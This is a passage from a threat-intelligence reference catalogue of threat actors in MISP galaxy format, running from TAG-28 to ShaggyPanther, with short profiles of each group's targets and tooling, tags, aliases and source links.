TAG-28 is a Chinese state-sponsored threat actor that has been targeting Indian organizations, including media conglomerates and government agencies. They have been using the Winnti malware, which is commonly shared among Chinese state-sponsored groups. TAG-28’s main objective is to gather intelligence on Indian targets, potentially for espionage purposes.

The tag is: misp-galaxy:threat-actor="TAG-28"

Table 12326. Table References

Links

https://www.recordedfuture.com/blog/china-linked-tag-28-targets-indias-the-times-group

Flax Typhoon

Flax Typhoon is a Chinese state-sponsored threat actor that primarily targets organizations in Taiwan. They conduct espionage campaigns and focus on gaining and maintaining long-term access to networks using minimal malware. Flax Typhoon relies on tools built into the operating system and legitimate software to remain undetected. They exploit vulnerabilities in public-facing servers, use living-off-the-land techniques, and deploy a VPN connection to maintain persistence and move laterally within compromised networks.

The tag is: misp-galaxy:threat-actor="Flax Typhoon"

Flax Typhoon is also known as:

  • Ethereal Panda

Table 12327. Table References

Links

https://www.microsoft.com/en-us/security/blog/2023/08/24/flax-typhoon-using-legitimate-software-to-quietly-access-taiwanese-organizations/

https://www.crowdstrike.com/global-threat-report/

Cyber Partisans

The Cyber Partisans, a hacktivist group based in Belarus, has been involved in various cyber-attacks targeting organizations and infrastructure in Belarus and Ukraine. They have hacked and wiped the network of the Belarusian Telegraph Agency, targeted the Belarusian Red Cross, and conducted ransomware attacks on the Belarusian Railway and Belarusian State University. The group aims to expose alleged crimes committed by pro-government organizations and disrupt operations supporting the Russian military operation against Ukraine. They have also leaked stolen data to journalists and expressed support for Ukraine.

The tag is: misp-galaxy:threat-actor="Cyber Partisans"

Table 12328. Table References

Links

https://blog.sekoia.io/the-transportation-sector-cyber-threat-overview/

https://riskybiznews.substack.com/p/risky-biz-news-cyber-partisans-hack

https://therecord.media/cyber-partisans-belarusian-state-university-attack

https://therecord.media/pro-ukraine-hackers-leak-russian-data-in-hopes-someone-will-make-sense-of-it/

https://therecord.media/this-app-will-self-destruct-how-belarusian-hackers-created-an-alternative-telegram-for-activists/

Caliente Bandits

Caliente Bandits is a highly active threat group that targets multiple industries, including finance and entertainment. They distribute the Bandook remote access trojan using Spanish-language lures through low-volume email campaigns. The group primarily impacts individuals with Spanish surnames and conducts reconnaissance to obtain employee data. They masquerade as companies in South America and use Hotmail or Gmail email addresses.

The tag is: misp-galaxy:threat-actor="Caliente Bandits"

Caliente Bandits is also known as:

  • TA2721

Table 12329. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-uses-spanish-language-lures-distribute-seldom-observed-bandook

Cotton Sandstorm

Cotton Sandstorm is an Iranian threat actor involved in hack-and-leak operations. They have targeted various organizations, including the French satirical magazine Charlie Hebdo, where they obtained and leaked personal information of over 200,000 customers. The group has been linked to the Iranian government and has been sanctioned by the US Treasury.

The tag is: misp-galaxy:threat-actor="Cotton Sandstorm"

Cotton Sandstorm is also known as:

  • Emennet Pasargad

  • Holy Souls

  • MARNANBRIDGE

  • NEPTUNIUM

Table 12330. Table References

Links

https://blog.sekoia.io/iran-cyber-threat-overview/

https://blogs.microsoft.com/on-the-issues/2023/02/03/dtac-charlie-hebdo-hack-iran-neptunium/

https://www.ic3.gov/Media/News/2022/220126.pdf

https://www.microsoft.com/en-us/security/business/security-insider/threat-briefs/iran-response-for-charlie-hebdo-attacks/

https://services.google.com/fh/files/misc/tool-of-first-resort-israel-hamas-war-cyber.pdf

Blackwood

Blackwood is a China-aligned APT group that has been active since at least 2018. They primarily engage in cyberespionage operations targeting individuals and companies in China, Japan, and the United Kingdom. Blackwood utilizes sophisticated techniques such as adversary-in-the-middle attacks to deliver their custom implant, NSPX30, through updates of legitimate software. They also have the capability to hide the location of their command and control servers by intercepting traffic generated by the implant.

The tag is: misp-galaxy:threat-actor="Blackwood"

Table 12331. Table References

Links

https://www.welivesecurity.com/en/eset-research/nspx30-sophisticated-aitm-enabled-implant-evolving-since-2005/

https://blog.sonicwall.com/en-us/2024/01/blackwood-apt-group-has-a-new-dll-loader/

Denim Tsunami

Denim Tsunami is a threat actor group that has been involved in targeted attacks against European and Central American customers. They have been observed using multiple Windows and Adobe 0-day exploits, including one for CVE-2022-22047, which is a privilege escalation vulnerability. Denim Tsunami developed a custom malware called Subzero, which has capabilities such as keylogging, capturing screenshots, data exfiltration, and running remote shells. They have also been associated with the Austrian spyware distributor DSIRF.

The tag is: misp-galaxy:threat-actor="Denim Tsunami"

Denim Tsunami is also known as:

  • KNOTWEED

  • DSIRF

Table 12332. Table References

Links

https://www.thezdi.com/blog/2023/1/23/activation-context-cache-poisoning-exploiting-csrss-for-privilege-escalation

https://socradar.io/threats-of-commercialized-malware-knotweed/

https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/

Blue Tsunami

Blue Tsunami, also known as Black Cube, is a cyber mercenary group associated with the private intelligence firm Black Cube. They target individuals in various industries, including human rights, finance, and consulting. Blue Tsunami engages in social engineering and uses techniques such as honeypot profiles, fake jobs, and fake companies to gather human intelligence for their clients. LinkedIn and Microsoft recently took down numerous fake accounts and company pages linked to Blue Tsunami.

The tag is: misp-galaxy:threat-actor="Blue Tsunami"

Blue Tsunami is also known as:

  • Black Cube

Table 12333. Table References

Links

https://precisionpconline.com/a-unified-front-against-cyber-mercenaries/

https://www.microsoft.com/en-us/security/blog/2023/11/09/microsoft-shares-threat-intelligence-at-cyberwarcon-2023/

Cuboid Sandstorm

Cuboid Sandstorm is an Iranian threat actor that targeted an Israel-based IT company in July 2021. They gained access to the company’s network and used it to compromise downstream customers in the defense, energy, and legal sectors in Israel. The group also utilized custom implants, including a remote access Trojan disguised as RuntimeBroker.exe or svchost.exe, to establish persistence on victim hosts.

The tag is: misp-galaxy:threat-actor="Cuboid Sandstorm"

Cuboid Sandstorm is also known as:

  • DEV-0228

Table 12334. Table References

Links

https://www.microsoft.com/security/blog/2021/11/18/iranian-targeting-of-it-sector-on-the-rise/

Pearl Sleet

Pearl Sleet is a nation-state activity group based in North Korea that has been active since at least 2012. They primarily target North Korean defectors and media organizations in carrying out their cyber espionage activities.

The tag is: misp-galaxy:threat-actor="Pearl Sleet"

Pearl Sleet is also known as:

  • DEV-0215

  • LAWRENCIUM

Table 12335. Table References

Links

https://techcommunity.microsoft.com/t5/microsoft-defender-xdr-blog/monthly-news-december-2023/ba-p/3998431

Carmine Tsunami

Carmine Tsunami is a threat actor linked to an Israel-based private sector offensive actor called QuaDream. QuaDream sells a platform called REIGN to governments for law enforcement purposes, which includes exploits, malware, and infrastructure for data exfiltration from mobile devices. Carmine Tsunami is associated with the iOS malware called KingsPawn and has targeted civil society victims, including journalists, political opposition figures, and NGO workers, in various regions. They utilize domain registrars and inexpensive cloud hosting providers, often using single domains per IP address and deploying free Let’s Encrypt SSL certificates.

The tag is: misp-galaxy:threat-actor="Carmine Tsunami"

Carmine Tsunami is also known as:

  • DEV-0196

  • QuaDream

Table 12336. Table References

Links

https://www.microsoft.com/en-us/security/blog/2023/04/11/dev-0196-quadreams-kingspawn-malware-used-to-target-civil-society-in-europe-north-america-the-middle-east-and-southeast-asia/

https://citizenlab.ca/2023/04/spyware-vendor-quadream-exploits-victims-customers/

Mustard Tempest

Mustard Tempest is a threat actor that primarily uses malvertising as their main technique to gain access to and profile networks. They deploy FakeUpdates, disguised as browser updates or software packages, to lure targets into downloading a ZIP file containing a JavaScript file. Once executed, the JavaScript framework acts as a loader for other malware campaigns, often Cobalt Strike payloads. Mustard Tempest has been associated with the cybercrime syndicate Mustard Tempest, also known as EvilCorp, and has been involved in ransomware attacks using payloads such as WastedLocker, PhoenixLocker, and Macaw.

The tag is: misp-galaxy:threat-actor="Mustard Tempest"

Mustard Tempest is also known as:

  • DEV-0206

  • Purple Vallhund

Table 12337. Table References

Links

https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/

http://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

UNC4990

UNC4990 is a financially motivated threat actor that has been active since at least 2020. They primarily target users in Italy and rely on USB devices for initial infection. The group has evolved their tactics over time, using encoded text files on popular websites like GitHub and Vimeo to host payloads. They have been observed using sophisticated backdoors like QUIETBOARD and EMPTYSPACE, and have targeted organizations in various industries, particularly in Italy.

The tag is: misp-galaxy:threat-actor="UNC4990"

Table 12338. Table References

Links

https://www.mandiant.com/resources/blog/unc4990-evolution-usb-malware

Caramel Tsunami

Caramel Tsunami is a threat actor that specializes in spyware attacks. They have recently resurfaced with an updated toolset and zero-day exploits, targeting specific victims through watering hole attacks. Candiru has been observed exploiting vulnerabilities in popular browsers like Google Chrome and using third-party signed drivers to gain access to the Windows kernel. They have also been linked to other spyware vendors and have been associated with extensive abuses of their surveillance tools.

The tag is: misp-galaxy:threat-actor="Caramel Tsunami"

Caramel Tsunami is also known as:

  • SOURGUM

  • Candiru

Table 12339. Table References

Links

https://decoded.avast.io/threatresearch/avast-q2-2022-threat-report/

https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/

https://citizenlab.ca/2022/04/catalangate-extensive-mercenary-spyware-operation-against-catalans-using-pegasus-candiru/

https://citizenlab.ca/2021/12/pegasus-vs-predator-dissidents-doubly-infected-iphone-reveals-cytrox-mercenary-spyware/

https://www.welivesecurity.com/2021/11/16/strategic-web-compromises-middle-east-pinch-candiru/

https://www.microsoft.com/en-us/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/

Storm-0867

Storm-0867 is a threat actor that has been active since 2012 and has targeted various industries and regions. They employ sophisticated phishing campaigns, utilizing social engineering techniques and a phishing as a service platform called Caffeine. Their attacks involve intercepting and manipulating communication between users and legitimate services, allowing them to steal passwords, hijack sign-in sessions, bypass multifactor authentication, and modify authentication methods.

The tag is: misp-galaxy:threat-actor="Storm-0867"

Storm-0867 is also known as:

  • DEV-0867

Table 12340. Table References

Links

https://techcommunity.microsoft.com/t5/microsoft-security-experts-blog/defender-experts-chronicles-a-deep-dive-into-storm-0867/ba-p/3911769

Velvet Tempest

Velvet Tempest is a threat actor associated with the BlackCat ransomware group. They have been observed deploying multiple ransomware payloads, including BlackCat, and have targeted various industries such as energy, fashion, tobacco, IT, and manufacturing. Velvet Tempest relies on access brokers to gain network access and utilizes tools like Cobalt Strike Beacons and PsExec for lateral movement and payload staging. They exfiltrate stolen data using a tool called StealBit and frequently disable unprotected antivirus products.

The tag is: misp-galaxy:threat-actor="Velvet Tempest"

Velvet Tempest is also known as:

  • DEV-0504

Table 12341. Table References

Links

https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/

http://www.microsoft.com/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/

Sunglow Blizzard

DEV-0665 is a threat actor associated with the HermeticWiper attacks. Their objective is to disrupt, degrade, and destroy specific resources within a targeted country.

The tag is: misp-galaxy:threat-actor="Sunglow Blizzard"

Sunglow Blizzard is also known as:

  • DEV-0665

Table 12342. Table References

Links

https://twitter.com/ESETresearch/status/1503436420886712321

https://thehackernews.com/2022/03/second-new-isaacwiper-data-wiper.html

Vanilla Tempest

Vice Society is a ransomware group that has been active since at least June 2021. They primarily target the education and healthcare sectors, but have also been observed targeting the manufacturing industry. The group has used multiple ransomware families and has been known to utilize PowerShell scripts for their attacks. There are similarities between Vice Society and the Rhysida ransomware group, suggesting a potential connection or rebranding.

The tag is: misp-galaxy:threat-actor="Vanilla Tempest"

Vanilla Tempest is also known as:

  • DEV-0832

  • Vice Society

Table 12343. Table References

Links

https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/

https://fourcore.io/blogs/rhysida-ransomware-history-ttp-adversary-emulation

https://detect.fyi/rhysida-ransomware-and-the-detection-opportunities-3599e9a02bb2

https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/

Lilac Typhoon

Lilac Typhoon is a threat actor attributed to China. They have been identified as exploiting the Atlassian Confluence RCE vulnerability CVE-2022-26134, which allows for remote code execution. This vulnerability has been used in cryptojacking campaigns and is included in commercial exploit frameworks. Lilac Typhoon has also been involved in deploying various payloads such as Cobalt Strike, web shells, botnets, coin miners, and ransomware.

The tag is: misp-galaxy:threat-actor="Lilac Typhoon"

Lilac Typhoon is also known as:

  • DEV-0234

Table 12344. Table References

Links

https://securityboulevard.com/2022/10/analysis-of-cisa-releases-advisory-on-top-cves-exploited-chinese-state-sponsored-groups/

https://riskybiznews.substack.com/p/risky-biz-news-google-shuts-down

https://twitter.com/MsftSecIntel/status/1535417776290111489

Ruby Sleet

Ruby Sleet is a threat actor linked to North Korea’s Ministry of State Security. Cerium has been involved in spear-phishing campaigns, compromising devices, and conducting cyberattacks alongside other North Korean threat actors. They have also targeted companies involved in COVID-19 research and vaccine development.

The tag is: misp-galaxy:threat-actor="Ruby Sleet"

Ruby Sleet is also known as:

  • CERIUM

Table 12345. Table References

Links

https://blogs.microsoft.com/on-the-issues/2020/11/13/health-care-cyberattacks-covid-19-paris-peace-forum/

Raspberry Typhoon

Microsoft has tracked Raspberry Typhoon (RADIUM) as the primary threat group targeting nations that ring the South China Sea. Raspberry Typhoon consistently targets government ministries, military entities, and corporate entities connected to critical infrastructure, particularly telecoms. Since January 2023, Raspberry Typhoon has been particularly persistent. When targeting government ministries or infrastructure, Raspberry Typhoon typically conducts intelligence collection and malware execution. In many countries, targets vary from defense and intelligence-related ministries to economic and trade-related ministries.

The tag is: misp-galaxy:threat-actor="Raspberry Typhoon"

Raspberry Typhoon is also known as:

  • RADIUM

Table 12346. Table References

Links

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RW1aFyW

Phlox Tempest

Phlox Tempest is a threat actor responsible for a large-scale click fraud campaign targeting users through YouTube comments and malicious ads. They use ChromeLoader to infect victims' computers with malware, often delivered as ISO image files that victims are tricked into downloading. The attackers aim to profit from clicks generated by malicious browser extensions or node-WebKit installed on the victim’s device. Microsoft and other cybersecurity organizations have issued warnings about this ongoing and prevalent campaign.

The tag is: misp-galaxy:threat-actor="Phlox Tempest"

Phlox Tempest is also known as:

  • DEV-0796

Table 12347. Table References

Links

https://twitter.com/MsftSecIntel/status/1570911625841983489

Storm-1295

Storm-1295 is a threat actor group that operates the Greatness phishing-as-a-service platform. They utilize synchronous relay servers to present targets with a replica of a sign-in page, resembling traditional phishing attacks. Their adversary-in-the-middle capability allows Storm-1295 to offer their services to other attackers. Active since mid-2022, Storm-1295 is tracked by Microsoft and is known for their involvement in the Greatness PhaaS platform.

The tag is: misp-galaxy:threat-actor="Storm-1295"

Storm-1295 is also known as:

  • DEV-1295

Table 12348. Table References

Links

https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/monthly-news-july-2023/ba-p/3860740

https://twitter.com/MsftSecIntel/status/1696273952870367320

Storm-1167

Storm-1167 is a threat actor tracked by Microsoft, known for their use of an AiTM phishing kit. They were responsible for launching an attack that led to Business Email Compromise activity.

The tag is: misp-galaxy:threat-actor="Storm-1167"

Storm-1167 is also known as:

  • DEV-1167

Table 12349. Table References

Links

https://www.microsoft.com/en-us/security/blog/2023/06/08/detecting-and-mitigating-a-multi-stage-aitm-phishing-and-bec-campaign/

Opal Sleet

Konni is a threat actor associated with APT37, a North Korean cyber crime group. They have been active since 2012 and are known for their cyber-espionage activities. Konni has targeted various sectors, including education, government, business organizations, and the cryptocurrency industry. They have exploited vulnerabilities such as CVE-2023-38831 and have used malware like KonniRAT to gain control of victim hosts and steal important information.

The tag is: misp-galaxy:threat-actor="Opal Sleet"

Opal Sleet is also known as:

  • OSMIUM

  • Konni

Table 12350. Table References

Links

https://nsfocusglobal.com/the-new-apt-group-darkcasino-and-the-global-surge-in-winrar-0-day-exploits/

https://paper.seebug.org/3031/

https://www.rewterz.com/rewterz-news/rewterz-threat-alert-konni-apt-group-active-iocs-11

https://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/

Storm-1044

Storm-1044 has been identified as part of a cyber campaign in collaboration with Twisted Spider. They employ a strategic approach, targeting specific endpoints using an initial access trojan called DanaBot. Once they gain access, Storm-1044 initiates lateral movement through Remote Desktop Protocol sign-in attempts, passing control to Twisted Spider. Twisted Spider then compromises the endpoints by introducing the CACTUS ransomware. Microsoft has detected ongoing malvertising attacks involving Storm-1044, leading to the deployment of CACTUS ransomware.

The tag is: misp-galaxy:threat-actor="Storm-1044"

Storm-1044 is also known as:

  • DEV-1044

Table 12351. Table References

Links

https://twitter.com/MsftSecIntel/status/1730383711437283757

Pink Sandstorm

Agonizing Serpens is an Iranian-linked APT group that has been active since 2020. They are known for their destructive wiper and fake-ransomware attacks, primarily targeting Israeli organizations in the education and technology sectors. The group has strong connections to Iran’s Ministry of Intelligence and Security and has been observed using various tools and techniques to bypass security measures. They aim to steal sensitive information, including PII and intellectual property, and inflict damage by wiping endpoints.

The tag is: misp-galaxy:threat-actor="Pink Sandstorm"

Pink Sandstorm is also known as:

  • AMERICIUM

  • BlackShadow

  • DEV-0022

  • Agrius

  • Agonizing Serpens

Table 12352. Table References

Links

https://www.oodaloop.com/archive/2024/01/02/critical-infrastructure-remains-the-brass-ring-for-cyber-attackers-in-2024/

https://unit42.paloaltonetworks.com/agonizing-serpens-targets-israeli-tech-higher-ed-sectors/

https://socprime.com/blog/agonizing-serpens-attack-detection-iran-backed-hackers-target-israeli-tech-firms-and-educational-institutions/

https://therecord.media/iran-linked-hackers-target-israel-education-tech-sectors

https://www.enigmasoftware.com/moneybirdransomware-removal/

https://research.checkpoint.com/2023/agrius-deploys-moneybird-in-targeted-attacks-against-israeli-organizations/

Storm-1084

Storm-1084 is a threat actor that has been observed collaborating with the MuddyWater group. They have used the DarkBit persona to mask their involvement in targeted attacks. Storm-1084 has been linked to destructive actions, including the encryption of on-premises devices and deletion of cloud resources. They have been observed using tools such as Rport, Ligolo, and a customized PowerShell backdoor. The extent of their autonomy or collaboration with other Iranian threat actors is currently unclear.

The tag is: misp-galaxy:threat-actor="Storm-1084"

Storm-1084 is also known as:

  • DEV-1084

Table 12353. Table References

Links

https://circleid.com/posts/20230824-signs-of-muddywater-developments-found-in-the-dns

https://www.microsoft.com/en-us/security/blog/2023/04/07/mercury-and-dev-1084-destructive-attack-on-hybrid-environment/

Storm-1099

Storm-1099 is a sophisticated Russia-affiliated influence actor that has been conducting pro-Russia influence operations targeting international supporters of Ukraine since Spring 2022. They are known for their website forgery operation called "Doppelganger" and have been actively spreading false information. They have been involved in pushing the claim that Hamas acquired Ukrainian weapons for an attack on Israel. Storm-1099 has also been implicated in amplifying images of graffiti in Paris, suggesting possible Russian involvement and aligning with Russia’s Active Measures playbook.

The tag is: misp-galaxy:threat-actor="Storm-1099"

Table 12354. Table References

Links

https://blogs.microsoft.com/on-the-issues/2023/12/07/russia-ukraine-digital-threat-celebrity-cameo-mtac/

Storm-1286

Storm-1286 is a threat actor that engages in large-scale spamming activities, primarily targeting user accounts without multifactor authentication enabled. They employ password spraying attacks to compromise these accounts and utilize legacy authentication protocols like IMAP and SMTP. In the past, they have attempted to compromise admin accounts and create new LOB applications with high administrative permissions to spread spam. Despite previous actions taken by Microsoft Threat Intelligence, Storm-1286 continues to explore new methods to establish a high-scale spamming platform within victim organizations using non-privileged users.

The tag is: misp-galaxy:threat-actor="Storm-1286"

Table 12355. Table References

Links

https://www.microsoft.com/en-us/security/blog/2023/12/12/threat-actors-misuse-oauth-applications-to-automate-financially-driven-attacks/

Storm-1101

DEV-1101 is a threat actor tracked by Microsoft who is responsible for developing and advertising phishing kits, specifically AiTM phishing kits. These kits are capable of bypassing multifactor authentication and are available for purchase or rent by other cybercriminals. DEV-1101 offers an open-source kit with various enhancements, such as mobile device management and CAPTCHA evasion. Their tool has been used in high-volume phishing campaigns by multiple actors, including DEV-0928, and is sold for $300 with VIP licenses available for $1,000.

The tag is: misp-galaxy:threat-actor="Storm-1101"

Storm-1101 is also known as:

  • DEV-1101

Table 12356. Table References

Links

http://www.microsoft.com/en-us/security/blog/2023/03/13/dev-1101-enables-high-volume-aitm-campaigns-with-open-source-phishing-kit/

Storm-0381

Storm-0381 is a threat actor identified by Microsoft as a Russian cybercrime group. They are known for their use of malvertising to deploy Magniber, a type of ransomware.

The tag is: misp-galaxy:threat-actor="Storm-0381"

Storm-0381 is also known as:

  • DEV-0381

Table 12357. Table References

Links

https://www.microsoft.com/en-us/security/security-insider/microsoft-digital-defense-report-2023

Storm-0530

H0lyGh0st is a North Korean threat actor that has been active since June 2021. They are responsible for developing and deploying the H0lyGh0st ransomware, which targets small-to-medium businesses in various sectors. The group employs "double extortion" tactics, encrypting data and threatening to publish it if the ransom is not paid. There are connections between H0lyGh0st and the PLUTONIUM APT group, indicating a possible affiliation.

The tag is: misp-galaxy:threat-actor="Storm-0530"

Storm-0530 is also known as:

  • DEV-0530

  • H0lyGh0st

Table 12358. Table References

Links

https://ics-cert.kaspersky.com/publications/reports/2023/03/24/apt-attacks-on-industrial-organizations-in-h2-2022/

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-040a

https://blogs.blackberry.com/en/2022/08/h0lygh0st-ransomware

https://www.microsoft.com/security/blog/2022/07/14/north-korean-threat-actor-targets-small-and-midsize-businesses-with-h0lygh0st-ransomware/

https://www.picussecurity.com/resource/h0lygh0st-north-korean-threat-group-strikes-back-with-new-ransomware

Storm-0539

Storm-0539 is a financially motivated threat actor that has been active since at least 2021. They primarily target retail organizations for gift card fraud and theft. Their tactics include phishing via emails or SMS to distribute malicious links that redirect users to phishing pages designed to steal credentials and session tokens. Once access is gained, Storm-0539 registers a device for secondary authentication prompts, bypassing multi-factor authentication and gaining persistence in the environment. They also collect emails, contact lists, and network configurations for further attacks against the same organizations.

The tag is: misp-galaxy:threat-actor="Storm-0539"

Table 12359. Table References

Links

https://www.rewterz.com/rewterz-news/rewterz-threat-update-microsoft-warns-of-emerging-threat-by-storm-0539-behind-gift-card-frauds/

https://techcommunity.microsoft.com/t5/microsoft-defender-xdr-blog/monthly-news-november-2023/ba-p/3970796

Storm-1152

Storm-1152, a cybercriminal group, was recently taken down by Microsoft for illegally reselling Outlook accounts. They operated by creating approximately 750 million fraudulent Microsoft accounts and earned millions of dollars in illicit revenue. Storm-1152 also offered CAPTCHA-solving services and was connected to ransomware and extortion groups. Microsoft obtained a court order to seize their infrastructure and domains, disrupting their operations.

The tag is: misp-galaxy:threat-actor="Storm-1152"

Table 12360. Table References

Links

https://securityboulevard.com/2023/12/microsoft-storm-1152-crackdown-stopping-threat-actors/

https://blogs.microsoft.com/on-the-issues/2023/12/13/cybercrime-cybersecurity-storm-1152-fraudulent-accounts/

https://www.rewterz.com/rewterz-news/rewterz-threat-update-microsoft-warns-of-emerging-threat-by-storm-0539-behind-gift-card-frauds/

Storm-1567

Storm-1567 is the threat actor behind the Ransomware-as-a-Service Akira. They attacked Swedish organizations in March 2023. This ransomware utilizes the ChaCha encryption algorithm, PowerShell, and Windows Management Instrumentation (WMI). Microsoft’s Defender for Endpoint successfully blocked a large-scale hacking campaign carried out by Storm-1567, highlighting the effectiveness of their security solution.

The tag is: misp-galaxy:threat-actor="Storm-1567"

Storm-1567 is also known as:

  • Akira

Table 12361. Table References

Links

https://news.sophos.com/en-us/2023/12/20/cryptoguard-an-asymmetric-approach-to-the-ransomware-battle/

https://securelist.com/crimeware-report-fakesg-akira-amos/111483/

https://www.trellix.com/en-us/about/newsroom/stories/research/akira-ransomware.html

https://blog.sekoia.io/sekoia-io-mid-2023-ransomware-threat-landscape

https://decoded.avast.io/threatresearch/avast-q2-2023-threat-report/

Storm-0829

Nwgen is a group that focuses on data exfiltration and ransomware activities. They have been found to share techniques with other threat groups such as Karakurt, Lapsus$, and Yanluowang. Nwgen has been observed carrying out attacks and deploying ransomware, encrypting files and demanding a ransom of $150,000 in Monero cryptocurrency for the decryption software.

The tag is: misp-galaxy:threat-actor="Storm-0829"

Storm-0829 is also known as:

  • DEV-0829

  • Nwgen Team

Table 12362. Table References

Links

https://www.enigmasoftware.com/nwgenransomware-removal/

https://www.databreaches.net/east-tennessee-childrens-hospital-updates-information-on-ransomware-incident/

https://readme.security/cybercrime-is-more-of-a-threat-than-nation-state-hackers-6f6cccf47721

https://twitter.com/cglyer/status/1546297609215696897

Storm-1674

Storm-1674 is an access broker known for using tools based on the publicly available TeamsPhisher tool to distribute DarkGate malware. Storm-1674 campaigns have typically relied on phishing lures sent over Teams with malicious attachments, such as ZIP files containing a LNK file that ultimately drops DarkGate and Pikabot. In September 2023, Microsoft observed handoffs from Storm-1674 to ransomware operators that have led to Black Basta ransomware deployment.

The tag is: misp-galaxy:threat-actor="Storm-1674"

Table 12363. Table References

Links

https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/

https://www.rewterz.com/rewterz-news/rewterz-threat-alert-widely-abused-msix-app-installer-disabled-by-microsoft-active-iocs/

Storm-0835

Cybercriminals have launched a phishing campaign targeting senior executives in U.S. firms, using the EvilProxy phishing toolkit for credential harvesting and account takeover attacks. This campaign, initiated in July 2023, primarily targets sectors such as banking, financial services, insurance, property management, real estate, and manufacturing. The attackers exploit an open redirection vulnerability on the job search platform "indeed.com," redirecting victims to malicious phishing pages impersonating Microsoft. EvilProxy functions as a reverse proxy, intercepting credentials, two-factor authentication codes, and session cookies to hijack accounts. The threat actors, known as Storm-0835 by Microsoft, have hundreds of customers who pay monthly fees for their services, making attribution difficult. The attacks involve sending phishing emails with deceptive links to Indeed, redirecting victims to EvilProxy pages for credential harvesting.

The tag is: misp-galaxy:threat-actor="Storm-0835"

Table 12364. Table References

Links

https://www.linkedin.com/pulse/cyber-criminals-using-evilproxy-phishing-kit-target-senior-soral/

Storm-1575

Storm-1575 is a threat actor identified by Microsoft as being involved in phishing campaigns using the Dadsec platform. They utilize hundreds of Domain Generation Algorithm (DGA) domains to host credential harvesting pages and target global organizations to steal Microsoft 365 credentials.

The tag is: misp-galaxy:threat-actor="Storm-1575"

Table 12365. Table References

Links

https://www.bridewell.com/insights/blogs/detail/analysing-widespread-microsoft365-credential-harvesting-campaign

https://twitter.com/MsftSecIntel/status/1712936244987019704?lang=en

TA2552

Since January 2020, Proofpoint researchers have tracked an actor abusing Microsoft Office 365 (O365) third-party application (3PA) access, with suspected activity dating back to August 2019. The actor, known as TA2552, uses well-crafted Spanish language lures that leverage a narrow range of themes and brands. The lures entice users to click a link in the message, taking them to the legitimate Microsoft third-party apps consent page. There they are prompted to grant a third-party application read-only user permissions to their O365 account via OAuth2 or other token-based authorization methods. TA2552 seeks access to specific account resources like the user’s contacts and mail. Requesting read-only permissions for such account resources could be used to conduct account reconnaissance, silently steal data, or to intercept password reset messages from other accounts such as those at financial institutions. While organizations with global presence have received messages from this group, they appear to choose recipients who are likely Spanish speakers.

The tag is: misp-galaxy:threat-actor="TA2552"

Table 12366. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/ta2552-uses-oauth-access-token-phishing-exploit-read-only-risks

TA2722

TA2722 is a highly active threat actor that targets various industries including Shipping/Logistics, Manufacturing, Business Services, Pharmaceutical, and Energy. They primarily focus on organizations in North America, Europe, and Southeast Asia. This threat actor impersonates Philippine government entities and uses themes related to the government to gain remote access to target computers. Their objectives include information gathering, installing follow-on malware, and engaging in business email compromise activities.

The tag is: misp-galaxy:threat-actor="TA2722"

TA2722 is also known as:

  • Balikbayan Foxes

Table 12367. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-spoofs-philippine-government-covid-19-health-data-widespread

TA2719

In late March 2020, Proofpoint researchers began tracking a new actor with a penchant for using NanoCore and later AsyncRAT, popular commodity remote access trojans (RATs). Dubbed TA2719 by Proofpoint, the actor uses localized lures with colorful images that impersonate local banks, law enforcement, and shipping services. Proofpoint has observed this actor send low volume campaigns to recipients in Austria, Chile, Greece, Hungary, Italy, North Macedonia, Netherlands, Spain, Sweden, Taiwan, United States, and Uruguay.

The tag is: misp-galaxy:threat-actor="TA2719"

Table 12368. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages

Karkadann

Karkadann is a threat actor that has been active since at least October 2020, targeting government bodies and news outlets in the Middle East. They have been involved in watering hole attacks, compromising high-profile websites to inject malicious JavaScript code. The group has been linked to another commercial spyware company called Candiru, suggesting they may utilize multiple spyware technologies. There are similarities in the infrastructure and tactics used by Karkadann in their campaigns.

The tag is: misp-galaxy:threat-actor="Karkadann"

Karkadann is also known as:

  • Piwiks

Table 12369. Table References

Links

https://securelist.com/apt-trends-report-q2-2022/106995/

https://www.welivesecurity.com/2021/11/16/strategic-web-compromises-middle-east-pinch-candiru/

Tomiris

Tomiris is a threat actor that has been active since at least 2019. They primarily target government and diplomatic entities in the Commonwealth of Independent States region, with occasional victims in other regions being foreign representations of CIS countries. Tomiris uses a wide variety of malware implants, including downloaders, backdoors, and file stealers, developed in different programming languages. They employ various attack vectors such as spear-phishing, DNS hijacking, and exploitation of vulnerabilities. There are potential ties between Tomiris and Turla, but they are considered separate threat actors with distinct targeting and tradecraft by Kaspersky.

The tag is: misp-galaxy:threat-actor="Tomiris"

Table 12370. Table References

Links

https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/

ShaggyPanther

ShaggyPanther is a threat actor that primarily targets government entities in Taiwan and Malaysia. They have been active since 2008 and utilize hidden encrypted payloads in registry keys. Their activities have been detected in various locations, including Indonesia and Syria.

The tag is: misp-galaxy:threat-actor="ShaggyPanther"

Table 12371. Table References

Links

https://securelist.com/ksb-2019-review-of-the-year/95394/

https://securelist.com/apt-trends-report-q3-2019/94530/

